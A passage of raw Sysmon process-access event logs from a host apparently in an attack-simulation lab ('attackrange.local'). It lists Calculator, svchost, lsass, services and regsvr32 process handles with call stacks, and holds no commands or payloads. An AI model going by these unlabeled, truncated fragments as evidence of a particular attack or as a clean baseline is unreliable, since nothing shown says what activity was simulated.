Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360412Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.874{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360411Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.858{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360410Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.858{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360409Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.858{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360408Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.858{8e433fbf-337b-6013-8402-000000001100}16567556C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360407Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360406Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360405Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337b-6013-8402-000000001100}16567556C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360404Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+bfd2|C:\Windows\SYSTEM32\psmserviceexthost.dll+be39|C:\Windows\SYSTEM32\psmserviceexthost.dll+bdac|C:\Windows\SYSTEM32\psmserviceexthost.dll+2f732|C:\Windows\SYSTEM32\psmserviceexthost.dll+3dd8c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360403Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+107a4|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360402Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360401Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0a00-000000001100}9044540C:\Windows\system32\services.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5b3d3|C:\Windows\System32\KERNEL32.DLL+1c9af|C:\Windows\system32\services.exe+b626|C:\Windows\system32\services.exe+e42b|C:\Windows\system32\services.exe+c695|C:\Windows\system32\services.exe+c304|C:\Windows\system32\services.exe+f1e0|C:\Windows\system32\services.exe+e0b6|C:\Windows\system32\services.exe+d98b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2 10341000x8000000000000000360400Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-1100-000000001100}11161040C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360399Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360398Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360397Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360396Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+31ff3|C:\Windows\system32\lsasrv.dll+2fb89|C:\Windows\system32\lsasrv.dll+2e5cf|C:\Windows\system32\lsasrv.dll+2aaa9|C:\Windows\system32\lsasrv.dll+2a418|C:\Windows\system32\lsasrv.dll+149ab|C:\Windows\SYSTEM32\SspiSrv.dll+177c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360395Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360394Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10daa|c:\windows\system32\lsm.dll+1008d|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360393Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ff97|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360392Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360391Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+310c0|C:\Windows\SYSTEM32\psmserviceexthost.dll+30dbf|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360390Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+29d90|C:\Windows\system32\lsasrv.dll+149ab|C:\Windows\SYSTEM32\SspiSrv.dll+177c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360389Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360388Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 